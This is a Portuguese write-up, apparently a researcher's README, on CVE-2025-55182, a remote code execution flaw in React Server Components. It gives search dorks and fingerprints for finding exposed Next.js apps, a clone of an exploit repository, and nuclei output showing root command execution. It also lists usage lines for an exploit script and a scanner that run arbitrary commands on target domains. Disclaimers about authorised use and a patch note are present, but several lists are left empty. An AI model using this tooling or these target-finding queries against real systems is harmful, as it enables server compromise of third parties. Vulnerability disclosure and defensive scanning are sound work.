
Uma vulnerabilidade crítica de Execução Remota de Código (RCE) afetando a implementação dos React Server Components (RSC) em vários pacotes, incluindo.
O CVE-2025-55182 é uma vulnerabilidade crítica de Execução Remota de Código (RCE) que afeta a implementação do React Server Components (RSC) em vários pacotes, incluindo:
A vulnerabilidade existe devido à desserialização insegura de payloads enviados através do protocolo interno Flight usado pelo RSC. Quando certas entradas não confiáveis fluem através dos React Server Components via requisições HTTP, a execução de código no lado do servidor pode ser acionada.
As versões afetadas incluem:
As versões corrigidas incluem:
Os React Server Components aceitam requisições do lado do cliente que são analisadas e desserializadas no backend. A vulnerabilidade surge de controles insuficientes em torno da desserialização de dados recebidos, permitindo que payloads especialmente criados sejam interpretados como componentes executáveis do lado do servidor. Quando isso acontece, a execução arbitrária de JavaScript pode ocorrer no servidor, o que pode levar ao comprometimento completo do servidor, dependendo do ambiente de hospedagem e privilégios.
Se explorado, um atacante pode ser capaz de:
Pontuação CVSS: 10.0 – CRÍTICA
Verificar se a aplicação expõe React Server Components e se versões afetadas estão em uso.
curl -I https://target.com/?__rsc=1
Essas palavras-chave ajudam a identificar se um repositório público ou aplicação web referencia componentes RSC.
"React Server Components" "Flight" inurl:src
"react-server-dom-webpack" filetype:lock
"server.references" "react"
"rsc" "react-dom"
site:yourdomain.com "react-server"
site:yourdomain.com "flight" "react"
site:yourdomain.com "rsc"
Destinado apenas à auditoria interna do domínio da sua organização.
Verifique o uso de frameworks expostos, não exploração de vulnerabilidades.
http.title:"Next.js"
"powered by" "Next.js"
X-Powered-By: Next.js
http.favicon.hash=
title="Next.js"
header="next-router-state-tree"
body="/_next/static/"
server="next"
Para automatizar a varredura defensiva, clone a lógica de detecção baseada em templates para sua própria avaliação de infraestrutura:
git clone https://github.com/cyberleelawat/CVE-2025-55182.git
cd CVE-2025-55182
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml
[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.
CVE-2025-55182.py)Script de exploração RCE completo que executa comandos arbitrários e recupera a saída.
Uso:
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"
chmod +x scanner.sh
# Scan with default command (id)
./scanner.sh -d example.com
# Execute custom command
./scanner.sh -d example.com -c "whoami"
# With full URL
./scanner.sh -d https://example.com -c "uname -a"
-d, --domain - Domínio/URL alvo (obrigatório)-c, --command - Comando a executar (padrão: id)# Check if target is vulnerable
./scanner.sh -d vulnerable-app.com
# Get system information
./scanner.sh -d vulnerable-app.com -c "uname -a"
# List files
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"
Bash
curl
openssl
Os templates dentro do repositório são destinados a:
IMPORTANTE: Esses templates devem ser executados apenas em sistemas que você possui ou está autorizado a avaliar.
Os templates Nuclei incluídos neste repositório são destinados exclusivamente para:
Por favor, garanta:
Atualize para uma das versões corrigidas:
Pesquisador de Segurança • Instrutor de Cibersegurança • Caçador de Bug Bounties
Lema: Zero Trust Full Secure 🚀